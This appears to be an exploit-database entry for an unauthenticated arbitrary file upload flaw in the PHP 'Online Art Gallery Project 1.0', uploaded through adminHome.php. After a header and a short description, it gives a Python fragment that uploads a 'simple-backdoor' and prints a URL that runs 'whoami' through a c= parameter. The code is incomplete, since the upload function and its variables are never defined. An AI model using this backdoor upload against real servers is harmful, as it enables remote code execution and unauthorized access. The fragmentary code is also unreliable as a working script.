# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
# Google Dork: n/a
# Date: 14/06/2023
# Exploit Author: Ramil Mustafayev
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a
# Vulnerability Description:
#
# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
# Usage: python exploit.py http://example.com
upload_file(target_url, file_name, file_content)
print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
Online art gallery project 1.0 arbitrary file upload (unauthenticated)